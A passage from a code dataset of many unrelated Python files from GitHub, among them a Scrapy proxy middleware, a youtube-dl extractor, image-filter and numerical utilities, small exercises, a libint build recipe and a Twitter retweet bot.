timetable.to_csv(timetable_file[:-4]+'_.csv', index=False)\r\n\r\n ### ensure manually take overlap from post-midnight runs are put into next days csvs\r\n\r\ntimetable_to_datetime('timetables/cen_wes_sat.csv')","repo_name":"fc445/4th-year","sub_path":"timetables_from_pdf.py","file_name":"timetables_from_pdf.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20414517001","text":"# -*- coding: utf-8 -*-\nimport random\nimport logging\n\nfrom scrapy import signals\n\n\nclass ProxyMiddleware(object):\n test_ip = ['http://user1:pwd1@123.123.123.123:123', 'http://user2:pwd2@234.234.234.234:234']\n num = 0\n\n def process_request(self, request, spider):\n request.meta['proxy'] = random.choice(self.test_ip)\n spider.logger.info('use the proxy is ' + str(request.meta.get('proxy', 'no proxy')))\n #spider.logger.info(request.headers)\n spider.logger.info('retry %d times '%self.num + 'and the request.headers is ' + str(request.headers))\n\n self.num += 1\n\n","repo_name":"ljm9104/scrapy","sub_path":"test_proxy_auth/test_proxy_auth/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"32250971610","text":"import math\n\n\ndef opt_n(c: float):\n a = math.sqrt(1 + 4/c)\n\n remainder = math.atan(1/math.tan(math.pi*(1+a)))\n\n return a - 0.5 + remainder/math.pi\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n import seaborn as sns\n import pandas as pd\n sns.set(rc={'figure.figsize': (10, 8)})\n\n partitions = 1000\n c_space = [n/partitions for n in range(1, partitions)]\n\n optimal_n = []\n\n for n, c in enumerate(c_space):\n optimal_n.append(opt_n(c))\n print(f'Progress: {n}/{len(c_space)}', end='\\r')\n\n optimal_n = pd.Series(optimal_n, index=c_space)\n\n if True:\n sns_plot = sns.lineplot(data=optimal_n)\n\n sns_plot.set(xlabel='c', ylabel='Optimal N')\n\n sns_plot.get_figure().savefig('Optimal_n.png')\n","repo_name":"NoFishLikeIan/tinbergen","sub_path":"homework/micro_three/plot_opt_n.py","file_name":"plot_opt_n.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"81"} +{"seq_id":"42052309502","text":"import torch\nfrom torch import nn\nfrom d2l import torch as d2l\n\n\ndef batch_norm(X, gamma, beta, moving_mean, moving_var, eps, momentum):\n if not torch.is_grad_enabled():\n x_hat = (X - moving_mean) / torch.sqrt(moving_var + eps)\n else:\n assert len(X.shape) in (2, 4)\n if len(X.shape) == 2:\n mean = X.mean(dim=0)\n var = ((X - mean)**2).mean(dim=0)\n else:\n mean = X.mean(dim=(0, 2, 3), keepdim=True)\n var = ((X - mean)**2).mean(dim=(0, 2, 3), keepdim=True)\n x_hat = (X - mean) / torch.sqrt(var + eps)\n moving_mean = momentum * moving_mean + (1.0 - momentum) * mean\n moving_var = momentum * moving_var + (1.0 - momentum) * var\n Y = gamma * X_hat + beta # 拉伸参数gamma和偏移参数beta\n return Y, moving_mean.data, moving_var.data\n\n\n","repo_name":"righterTY/d2l","sub_path":"demo7/demo7_5.py","file_name":"demo7_5.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4812317943","text":"import math\n\ndef find_st(p):\n t = p-1\n s = 0\n while t%2 == 0:\n t >>= 1\n s += 1\n \n return s,t\n\ndef egcd(a, b):\n if a == 0:\n return (b, 0, 1)\n else:\n g, y, x = egcd(b % a, a)\n return (g, x - (b // a) * y, y)\n\ndef modinv(a, m):\n g, x, y = egcd(a, m)\n if g != 1:\n raise Exception('modular inverse does not exist')\n else:\n return x % m\n \ndef compute_init_vals(p, limb_bitsize=64):\n iv = dict()\n iv['modulus'] = p\n iv['s'],iv['t'] = find_st(p)\n iv['t_minus_1_over_2'] = (iv['t']-1)//2\n iv['euler'] = (p-1)//2\n iv['num_bits'] = math.ceil(math.log2(p))\n iv['inv'] = 2**limb_bitsize - modinv(p,2**limb_bitsize)\n iv['Rsquared'] = (2**limb_bitsize)**(2 * math.ceil(math.log2(p)/limb_bitsize)) % p\n iv['Rcubed'] = (2**limb_bitsize)**(3 * math.ceil(math.log2(p)/limb_bitsize)) % p\n return iv \n\ndef pprint(iv,prefix,limb_bitsize=64):\n numlimbs = math.ceil(iv['num_bits']/limb_bitsize)\n print ('auto modulus = bigint<static_cast<mp_size_t>(%d)>(\"%s\");'%(numlimbs,iv['modulus']))\n\n for k in ['euler','t','t_minus_1_over_2','Rsquared','Rcubed',]:\n print('%s::%s = bigint<static_cast<mp_size_t>(%d)>(\"%s\");' % (prefix,k,numlimbs,iv[k]))\n\n print('%s::%s = %s;' % (prefix,'s',iv['s'])) \n print('%s::%s = %s;' % (prefix,'num_bits',iv['num_bits']))\n \n print('%s::%s = %sUL;' % (prefix,'inv',iv['inv']))\n ","repo_name":"niekbouman/libff_init","sub_path":"libff_field_init.py","file_name":"libff_field_init.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18540463945","text":"#!/usr/bin/env python\n\nimport sys\nimport re\n\nfrom Bio import SeqIO\n\nrecord = SeqIO.read(sys.stdin, \"genbank\")\n\nkey = \"locus_tag\"\nfor feature in record.features:\n if feature.type == \"CDS\" and key not in feature.qualifiers:\n product = feature.qualifiers.get(\"product\", [\"\"])[0]\n if product:\n feature.qualifiers[key] = re.sub(r\"[^a-zA-Z0-9*_-]\", \"_\", product)\n\nSeqIO.write(record, sys.stdout, \"genbank\")\n","repo_name":"dnanto/dissertation","sub_path":"workflow/scripts/add_locus_tag.py","file_name":"add_locus_tag.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74717123146","text":"# encoding: utf-8\nfrom __future__ import unicode_literals\n\nfrom .common import InfoExtractor\nfrom ..compat import compat_xpath\nfrom ..utils import (\n int_or_none,\n qualities,\n unified_strdate,\n xpath_attr,\n xpath_element,\n xpath_text,\n xpath_with_ns,\n)\n\n\nclass FirstTVIE(InfoExtractor):\n IE_NAME = '1tv'\n IE_DESC = 'Первый канал'\n _VALID_URL = r'https?://(?:www\\.)?1tv\\.ru/(?:[^/]+/)+p?(?P<id>\\d+)'\n\n _TESTS = [{\n # single format via video_materials.json API\n 'url': 'http://www.1tv.ru/prj/inprivate/vypusk/35930',\n 'md5': '82a2777648acae812d58b3f5bd42882b',\n 'info_dict': {\n 'id': '35930',\n 'ext': 'mp4',\n 'title': 'Гость Людмила Сенчина. Наедине со всеми. Выпуск от 12.02.2015',\n 'description': 'md5:357933adeede13b202c7c21f91b871b2',\n 'thumbnail': 're:^https?://.*\\.(?:jpg|JPG)$',\n 'upload_date': '20150212',\n 'duration': 2694,\n },\n }, {\n # multiple formats via video_materials.json API\n 'url': 'http://www.1tv.ru/video_archive/projects/dobroeutro/p113641',\n 'info_dict': {\n 'id': '113641',\n 'ext': 'mp4',\n 'title': 'Весенняя аллергия. Доброе утро. Фрагмент выпуска от 07.04.2016',\n 'description': 'md5:8dcebb3dded0ff20fade39087fd1fee2',\n 'thumbnail': 're:^https?://.*\\.(?:jpg|JPG)$',\n 'upload_date': '20160407',\n 'duration': 179,\n 'formats': 'mincount:3',\n },\n 'params': {\n 'skip_download': True,\n },\n }, {\n # single format only available via ONE_ONLINE_VIDEOS.archive_single_xml API\n 'url': 'http://www.1tv.ru/video_archive/series/f7552/p47038',\n 'md5': '519d306c5b5669761fd8906c39dbee23',\n 'info_dict': {\n 'id': '47038',\n 'ext': 'mp4',\n 'title': '\"Побег\". Второй сезон. 3 серия',\n 'description': 'md5:3abf8f6b9bce88201c33e9a3d794a00b',\n 'thumbnail': 're:^https?://.*\\.(?:jpg|JPG)$',\n 'upload_date': '20120516',\n 'duration': 3080,\n },\n }, {\n 'url': 'http://www.1tv.ru/videoarchive/9967',\n 'only_matching': True,\n }]\n\n def _real_extract(self, url):\n video_id = self._match_id(url)\n\n # Videos with multiple formats only available via this API\n video = self._download_json(\n 'http://www.1tv.ru/video_materials.json?legacy_id=%s' % video_id,\n video_id, fatal=False)\n\n description, thumbnail, upload_date, duration = [None] * 4\n\n if video:\n item = video[0]\n title = item['title']\n quality = qualities(('ld', 'sd', 'hd', ))\n formats = [{\n 'url': f['src'],\n 'format_id': f.get('name'),\n 'quality': quality(f.get('name')),\n } for f in item['mbr'] if f.get('src')]\n thumbnail = item.get('poster')\n else:\n # Some videos are not available via video_materials.json\n video = self._download_xml(\n 'http://www.1tv.ru/owa/win/ONE_ONLINE_VIDEOS.archive_single_xml?pid=%s' % video_id,\n video_id)\n\n NS_MAP = {\n 'media': 'http://search.yahoo.com/mrss/',\n }\n\n item = xpath_element(video, './channel/item', fatal=True)\n title = xpath_text(item, './title', fatal=True)\n formats = [{\n 'url': content.attrib['url'],\n } for content in item.findall(\n compat_xpath(xpath_with_ns('./media:content', NS_MAP))) if content.attrib.get('url')]\n thumbnail = xpath_attr(\n item, xpath_with_ns('./media:thumbnail', NS_MAP), 'url')\n\n self._sort_formats(formats)\n\n webpage = self._download_webpage(url, video_id, 'Downloading page', fatal=False)\n if webpage:\n title = self._html_search_regex(\n (r'<div class=\"tv_translation\">\\s*<h1><a href=\"[^\"]+\">([^<]*)</a>',\n r\"'title'\\s*:\\s*'([^']+)'\"),\n webpage, 'title', default=None) or title\n description = self._html_search_regex(\n r'<div class=\"descr\">\\s*<div> </div>\\s*<p>([^<]*)</p></div>',\n webpage, 'description', default=None) or self._html_search_meta(\n 'description', webpage, 'description')\n thumbnail = thumbnail or self._og_search_thumbnail(webpage)\n duration = int_or_none(self._html_search_meta(\n 'video:duration', webpage, 'video duration', fatal=False))\n upload_date = unified_strdate(self._html_search_meta(\n 'ya:ovs:upload_date', webpage, 'upload date', fatal=False))\n\n return {\n 'id': video_id,\n 'thumbnail': thumbnail,\n 'title': title,\n 'description': description,\n 'upload_date': upload_date,\n 'duration': int_or_none(duration),\n 'formats': formats\n }\n","repo_name":"galgamerslee/youtobedl","sub_path":"youtube_dl/extractor/firsttv.py","file_name":"firsttv.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"41202643499","text":"import numpy as np\nimport scipy as sp\nimport scipy.ndimage\n\n\ndef box(img, r):\n \"\"\" O(1) box filter\n img - >= 2d image\n r - radius of box filter\n \"\"\"\n (rows, cols) = img.shape[:2]\n imDst = np.zeros_like(img)\n\n\n tile = [1] * img.ndim\n tile[0] = r\n imCum = np.cumsum(img, 0)\n imDst[0:r+1, :, ...] = imCum[r:2*r+1, :, ...]\n imDst[r+1:rows-r, :, ...] = imCum[2*r+1:rows, :, ...] - imCum[0:rows-2*r-1, :, ...]\n imDst[rows-r:rows, :, ...] = np.tile(imCum[rows-1:rows, :, ...], tile) - imCum[rows-2*r-1:rows-r-1, :, ...]\n\n tile = [1] * img.ndim\n tile[1] = r\n imCum = np.cumsum(imDst, 1)\n imDst[:, 0:r+1, ...] = imCum[:, r:2*r+1, ...]\n imDst[:, r+1:cols-r, ...] = imCum[:, 2*r+1 : cols, ...] - imCum[:, 0 : cols-2*r-1, ...]\n imDst[:, cols-r: cols, ...] = np.tile(imCum[:, cols-1:cols, ...], tile) - imCum[:, cols-2*r-1 : cols-r-1, ...]\n\n return imDst\n\n\ndef _gf_gray(I, p, r, eps, s=None):\n \"\"\" grayscale (fast) guided filter\n I - guide image (1 channel)\n p - filter input (1 channel)\n r - window raidus\n eps - regularization (roughly, allowable variance of non-edge noise)\n s - subsampling factor for fast guided filter\n \"\"\"\n if s is not None:\n Isub = sp.ndimage.zoom(I, 1/s, order=1)\n Psub = sp.ndimage.zoom(p, 1/s, order=1)\n r = round(r / s)\n else:\n Isub = I\n Psub = p\n\n\n (rows, cols) = Isub.shape\n\n N = box(np.ones([rows, cols]), r)\n\n meanI = box(Isub, r) / N\n meanP = box(Psub, r) / N\n corrI = box(Isub * Isub, r) / N\n corrIp = box(Isub * Psub, r) / N\n varI = corrI - meanI * meanI\n covIp = corrIp - meanI * meanP\n\n\n a = covIp / (varI + eps)\n b = meanP - a * meanI\n\n meanA = box(a, r) / N\n meanB = box(b, r) / N\n\n if s is not None:\n meanA = sp.ndimage.zoom(meanA, s, order=1)\n meanB = sp.ndimage.zoom(meanB, s, order=1)\n\n q = meanA * I + meanB\n return q\n\n\ndef _gf_colorgray(I, p, r, eps, s=None):\n \"\"\" automatically choose color or gray guided filter based on I's shape \"\"\"\n if I.ndim == 2 or I.shape[2] == 1:\n return _gf_gray(I, p, r, eps, s)\n else:\n print(\"Invalid guide dimensions:\", I.shape)\n\n\ndef guided_filter(I, p, r, eps, s=None):\n \"\"\" run a guided filter per-channel on filtering input p\n I - guide image (1 or 3 channel)\n p - filter input (n channel)\n r - window raidus\n eps - regularization (roughly, allowable variance of non-edge noise)\n s - subsampling factor for fast guided filter\n \"\"\"\n if p.ndim == 2:\n p3 = p[:,:,np.newaxis]\n else:\n p3 = p\n\n out = np.zeros_like(p3)\n for ch in range(p3.shape[2]):\n out[:,:,ch] = _gf_colorgray(I, p3[:,:,ch], r, eps, s)\n return np.squeeze(out) if p.ndim == 2 else out\n\n\ndef test_gf():\n import imageio\n cat = imageio.imread('/home/yipai/depth_shape_data/unchecked_result/shizi/1573025814.75.jpg').astype(np.float32) / 255\n tulips = imageio.imread('/home/yipai/depth_shape_data/unchecked_result/shizi/1573025814.75.jpg').astype(np.float32) / 255\n\n # cat = imageio.imread('cat.bmp').astype(np.float32) / 255\n # tulips = imageio.imread('tulips.bmp').astype(np.float32) / 255\n\n r = 8\n eps = 0.05\n\n cat_smoothed = guided_filter(cat, cat, r, eps)\n cat_smoothed_s4 = guided_filter(cat, cat, r, eps, s=4)\n\n imageio.imwrite('cat_smoothed.png', cat_smoothed)\n imageio.imwrite('cat_smoothed_s4.png', cat_smoothed_s4)\n\n tulips_smoothed4s = np.zeros_like(tulips)\n for i in range(3):\n tulips_smoothed4s[:,:,i] = guided_filter(tulips, tulips[:,:,i], r, eps, s=4)\n imageio.imwrite('tulips_smoothed4s.png', tulips_smoothed4s)\n\n tulips_smoothed = np.zeros_like(tulips)\n for i in range(3):\n tulips_smoothed[:,:,i] = guided_filter(tulips, tulips[:,:,i], r, eps)\n imageio.imwrite('tulips_smoothed.png', tulips_smoothed)\n\nif __name__ == \"__main__\":\n test_gf()\n","repo_name":"Guanlan-gkd/finger_vision_master","sub_path":"scripts/fv_lib/gf.py","file_name":"gf.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"73530207624","text":"from PIL import Image\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torchvision import transforms\n\n\nimg_path = \"data/train/ants/0013035.jpg\"\n# Image是python中内置的默认打开图片的函数库\nimg = Image.open(img_path)\n# print(img)\n\nwriter = SummaryWriter(\"logs\")\n\n# python的用法 -> tensor数据类型\n# 通过transforms.ToTensor去看两个问题:\n\n# 1. transforms如何使用(python)\n\ntensor_trans = transforms.ToTensor()\ntensor_img = tensor_trans(img)\nprint(tensor_img)\n# 借助transforms中内置的众多工具/方法/模板,来打造自己需要的工具\n\n# 2. 为什么需要Tensor数据类型\nwriter.add_image(\"tensor_img\", tensor_img)\nwriter.close()\n\n","repo_name":"ShinATK/Python","sub_path":"Pytorch_quicklearn/P9_transforms.py","file_name":"P9_transforms.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34657098776","text":"def insertion(N, M, i, j):\n mask1 = (-1 << (j+1))\n mask2 = ((1 << i) - 1)\n mask = mask1 | mask2\n N_cleared = N & mask\n M_shifted = M << i\n return (N_cleared | M_shifted)\n\nif __name__ == \"__main__\":\n N = int('10000000000', 2)\n M = int('10011', 2)\n result = insertion(N, M, 2, 6)\n print(bin(result))\n","repo_name":"redixhumayun/ctci","sub_path":"Bits/insertion.py","file_name":"insertion.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34049473337","text":"from collections import defaultdict\r\n\r\n\r\nwith open('C:\\Program Files (x86)\\AdventOfCode\\AoC_day6_test_File.txt') as f:\r\n lines = [int(x) for x in f.readline().split(',')]\r\n\r\ndays = defaultdict(int)\r\n\r\nfor line in lines:\r\n if line not in days:\r\n days[line] = 0\r\n days[line] += 1\r\n\r\n\r\n\r\n\r\nfor day in range(256):\r\n futuredays = defaultdict(int)\r\n for i, j in days.items():\r\n if i == 0:\r\n futuredays[6] += j\r\n futuredays[8] += j\r\n else:\r\n futuredays[i-1] += j\r\n days = futuredays \r\n\r\nprint(sum(days.values()))","repo_name":"jtrosclair1995/AoC2021","sub_path":"Aoc_day6_Part2_Answer.py","file_name":"Aoc_day6_Part2_Answer.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2848378536","text":"def linear_search(arr,key,n):\r\n for i in range(0,n):\r\n if arr[i]==key:\r\n return i\r\n return -1\r\n\r\narr=[]\r\nn=int(input(\"Enter the no. of elements:\\n\"))\r\nprint(\"Enter the values of element:\")\r\nfor i in range(0,n):\r\n ele=int(input())\r\n arr.append(ele)\r\n\r\nkey=int(input(\"Enter the element, which you want to search.\\n\"))\r\nresult=linear_search(arr,key,n)\r\n\r\nif result==-1:\r\n print(\"Element not found!\")\r\nelse:\r\n print(\"Element found at index: \",result)\r\n","repo_name":"priyanshuudainiya/Python-Practice","sub_path":"linear_search.py","file_name":"linear_search.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29885466486","text":"def largestPower(num):\n n = int(num)\n k = 0\n while n >= 1:\n if pow(2, k) >= n:\n if pow(2, k) > n:\n k -= 1\n x = pow(2, k)\n break\n k += 1\n print(x)\n\n\nnum = int(input(\"Enter a no.: \"))\nlargestPower(num)","repo_name":"Ashutoshkr007/Spartans","sub_path":"Day1_Q5_Largest_pow.py","file_name":"Day1_Q5_Largest_pow.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21450651205","text":"\"\"\"\n Crie um programa que leia o ano de nascimento de sete pessoas. No final mostre quantas pessoas ainda não antingiram a maior idade e quantas já são maiores.\n\n Considere maior idade 21 anos\n\"\"\"\nimport datetime\nprint('Análise de Idades')\nmaior = 0\nmenor = 0\nano = datetime.date.today().year\nfor i in range(1, 8):\n nascimento = int(input(f'Em qual ano nasceu a {i}º Pessoa: '))\n idade = ano - nascimento\n if (idade >= 21):\n maior += 1\n else:\n menor += 1\n\nprint(f'Temos {maior} maiores de idade, e {menor} menores de idade')\n","repo_name":"otonielnn/Python_CursoEmVideo","sub_path":"Desafios/ex054.py","file_name":"ex054.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4333245085","text":"# -*- coding: UTF-8 -*-\n# python3\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\nweb_data = requests.get(\"http://python.org/\") # get 整个网页元数据\npython_html = web_data.text # 元数据中提取html部分的文本\nsoup = BeautifulSoup(python_html,'lxml') # 解析html文本,好比 混合物状态的汤 变成 分层的汤\nclean = soup.get_text() #从“分层”的汤里,提取“html文本”这一层 \n# print(clean)\ntokens = [tok for tok in clean.split()]\nprint(\"Total number of tokens: {}\".format(len(tokens)))\nprint(tokens[:25])\nprint(\"\\n---------------\")\n# 对比:用re貌似提纯度更高,也可能分词更细导致噪音增加\ntokens_by_re = re.split(\"\\W+\", clean)\nprint(\"Total number of tokens_by_re: {}\".format(len(tokens_by_re)))\nprint(tokens_by_re[:25])\n\nimport nltk\nFreq_dist_nltk = nltk.FreqDist(tokens) # 词频统计\nprint(Freq_dist_nltk)\nprint(\"\\n------------\")\nfor k, v in Freq_dist_nltk.items():\n print(str(k) + ':' + str(v))\n\n# stopwords exist\nFreq_dist_nltk.plot(50, cumulative=False)\n\n# no stopwords\n# stopwords = [word.strip().lower() for word in open(\"PATH/english.stop.txt\")]\n# clean_tokens = [tok for tok in tokens if len(tok.lower()) > 1 and (tok.lower() not in stopwords)]\n# Freq_dist_nltk = nltk.FreqDist(clean_tokens)\n# Freq_dist_nltk.plot(50, cumulative=False)\n","repo_name":"Zorro-Lin-7/My-Machine-Learning-Learning-Path","sub_path":"NLP/NLTK Essentials/Chapter01/python3_NLTK.py","file_name":"python3_NLTK.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"8171275214","text":"import seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef bar_charts(df):\n fig, axs = plt.subplots(2, 4, sharex=True, sharey=True)\n # Iterate over each column in the DataFrame\n i, j = 0, 0\n\n for column, ax in zip(df.columns, axs.flatten()):\n ax.grid(True)\n if j > 3: j = 0\n # Create a bar plot for the current column, colored by the grouped 'D Age' column\n sns.barplot(x=df.index, y=column, data=df, palette='viridis', ax=axs[i][j])\n # Set the title of the plot to the current column name\n plt.title(column)\n plt.legend(loc='upper right')\n # Rotate x-axis labels for better visibility\n plt.xticks(rotation=75)\n if j == 3: i += 1\n j += 1\n # Display the plot\n plt.show()\n\ndef corr_heatmap(corr_matrix):\n \n plt.figure(figsize=(10, 8))\n sns.heatmap(corr_matrix, annot=True, cmap='coolwarm')\n plt.title('Correlation Matrix')\n plt.show()","repo_name":"Stratar/Inferring-Touorist-Thematic-Preferences","sub_path":"data_visualisation.py","file_name":"data_visualisation.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21541274696","text":"from time import sleep\n\n\n# The default speed for each line appearing on the command line\nsleep_time = 0.025\n\n\ndef display_menu(message):\n \"\"\"Displays a menu with a given message. Each menu has a standard speed at\n which it appears and a standard formatting, hence this helper method.\n\n Parameters\n ----------\n message : str\n The message to be delivered in the menu\n\n Returns\n -------\n None\n \"\"\"\n print(\"\\n\")\n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\")\n sleep(sleep_time)\n for line in message.splitlines():\n if len(line) != 0:\n print(line)\n sleep(sleep_time)\n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\")\n sleep(sleep_time * 2)","repo_name":"gzinck/des","sub_path":"cli/display/display_menu.py","file_name":"display_menu.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"41773068755","text":"def calc_media(tupla):\n '''Recebe tupla (RA,P1,P2) e produz tupla (RA,P1,P2,Média)'''\n ra, p1, p2 = tupla\n return (ra, p1, p2, (p1 + p2) / 2)\n\nif __name__ == '__main__':\n # Entrada de dados\n print('Dados dos Alunos')\n alunos = []\n resp = 'S'\n while resp.upper() == 'S':\n RA = input('RA? ')\n try:\n P1 = float(input('P1? '))\n P2 = float(input('P2? '))\n alunos.append((RA, P1, P2))\n resp = input('Outro aluno [S|N]? ')\n except:\n # quando ocorre erro, repete entrada\n resp = 'S'\n print(alunos)\n\n # Mapeamento\n print('Médias dos Alunos')\n # aplica função calc_media aos elementos da lista alunos\n resultados = list(map(calc_media, alunos))\n print(resultados)\n","repo_name":"pjandl/opy2","sub_path":"Lista_1/opy2_l1_exercicio04.py","file_name":"opy2_l1_exercicio04.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"9098929805","text":"from typing import List\n\nfrom brick_yard.blue_print import CMakeBluePrint, EnvVars\n\n\nclass libint(CMakeBluePrint):\n \"\"\"\n libint -- Integral library for QChem and CP2K\n \"\"\"\n\n name = \"libint\"\n version = \"2.7.1\"\n required_lmod = [\"cmake\", \"eigen\"]\n\n def source(self, env: EnvVars) -> List[str]:\n env.base_folder = f\"libint-{env.version}\"\n env.tar_file = f\"{env.base_folder}.tgz\"\n env.url = f\"https://github.com/evaleev/libint/releases/download/v{env.version}/{env.tar_file}\"\n\n return [\n f\"wget {env.url} -P {env.source_path}\",\n f\"tar -xf {env.source_path}/{env.tar_file} -C {env.source_path}\",\n f\"rm -rf {env.source_path}/{env.tar_file}\",\n f\"mv {env.source_path}/{env.base_folder}/* {env.source_path}\",\n ]\n","repo_name":"dustinrb/CBECws_bootsrap","sub_path":"blue_prints/libint.py","file_name":"libint.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27428417642","text":"# 1748 수 이어 쓰기1\r\nimport sys\r\ninput = sys.stdin.readline\r\nN = int(input())\r\n\r\nlength = len(str(N))\r\nsum = 0\r\nfor i in range(length-1):\r\n sum += (i+1)*9*10**i\r\n\r\nprint(sum+ length*(N-10**(length-1)+1))\r\n\r\n ","repo_name":"daeun0220/code_study","sub_path":"codeplus/Bruteforce/broj.py","file_name":"broj.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24979350053","text":"#!/usr/bin/python3\nimport numpy\ndef build_matrix(size):\n zeros = ['0' for i in range(size // 10)]\n ones = ['1' for i in range(size // 10)]\n spaces = [' ' for i in range(size - len(zeros) - len(ones))]\n total = zeros + ones + spaces\n numpy.random.shuffle(total)\n return ''.join(total)\n\n# Keep times between 100 to 500 \ntimes = 300\nmatrix = build_matrix(5000)\nflag = \"m365{needle_1n_hayst4ck}\"\nwhile True:\n if times == 0:\n print(flag, end='')\n print(matrix, end='')\n times -= 1","repo_name":"3vilbuff3r/ctf-public","sub_path":"dev/matrix/runme.py","file_name":"runme.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41189381646","text":"from functools import lru_cache\nfrom host.models import PkeyModel\n\n\n\nclass PkeyManger(object):\n '''管理公私钥类'''\n\n keys = ('public_key', 'private_key')\n\n @classmethod\n @lru_cache(maxsize=64)\n def get(cls, name):\n '''获取公私钥,从库中获取'''\n info = PkeyModel.objects.filter(name=name).first()\n if not info:\n raise KeyError(f'没有这个{name!r}密钥对')\n\n #已元祖形式,返回公私钥\n return (info.private, info.public)\n\n @classmethod\n def set(cls, name, private_key, public_key, description=None):\n '''保存公私钥,入库'''\n PkeyModel.objects.update_or_create(name=name, defaults={\n 'private': private_key,\n 'public': public_key,\n 'description': description\n })","repo_name":"ChuzhouOpensource/orange","sub_path":"orange_api/orange_api/utils/key.py","file_name":"key.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3141607314","text":"# [카카오] 키패드 누르기\nlocations = [\n (3, 1),\n (0, 0),\n (0, 1),\n (0, 2),\n (1, 0),\n (1, 1),\n (1, 2),\n (2, 0),\n (2, 1),\n (2, 2),\n]\n\n\ndef solution(numbers, hand):\n answer = []\n left = (3, 0)\n right = (3, 2)\n for number in numbers:\n ny, nx = locations[number]\n if nx == 0:\n answer.append(\"L\")\n left = (ny, nx)\n elif nx == 2:\n answer.append(\"R\")\n right = (ny, nx)\n else:\n distance_from_left = abs(ny - left[0]) + abs(nx - left[1])\n distance_from_right = abs(ny - right[0]) + abs(nx - right[1])\n if distance_from_left < distance_from_right:\n answer.append(\"L\")\n left = (ny, nx)\n elif distance_from_left > distance_from_right:\n answer.append(\"R\")\n right = (ny, nx)\n else:\n if hand == \"left\":\n answer.append(\"L\")\n left = (ny, nx)\n else:\n answer.append(\"R\")\n right = (ny, nx)\n return \"\".join(answer)\n\n\nif __name__ == \"__main__\":\n numbers = [1, 3, 4, 5, 8, 2, 1, 4, 5, 9, 5]\n hand = \"right\"\n print(solution(numbers, hand))\n","repo_name":"mrbartrns/algorithm-and-structure","sub_path":"programmers/lv1/numberpad.py","file_name":"numberpad.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26722561640","text":"import datetime\nimport os\nimport time\nfrom os import environ\n\nimport tweepy\n\ntoday_date = datetime.date.today()\nsince_date = today_date - datetime.timedelta(days=1)\n\napi_key = environ[\"api_key\"]\napi_secret = environ[\"api_secret\"]\n\na_token = environ[\"a_token\"]\na_t_secret = environ[\"a_t_secret\"]\n\nauth = tweepy.OAuthHandler(api_key, api_secret)\nauth.set_access_token(a_token, a_t_secret)\n\napi = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n\nq = \"FAIRdata\" or \"datamanagement\" or \"datagovernance\" or \"datascience\"\n\nnrTweets = 20\n\nuser = api.me()\n\nfor tweet in tweepy.Cursor(api.search, q=q, since=since_date).items(nrTweets):\n try:\n tweet.retweet()\n time.sleep(300)\n except tweepy.TweepError as e:\n print(e.reason)\n except StopIteration:\n 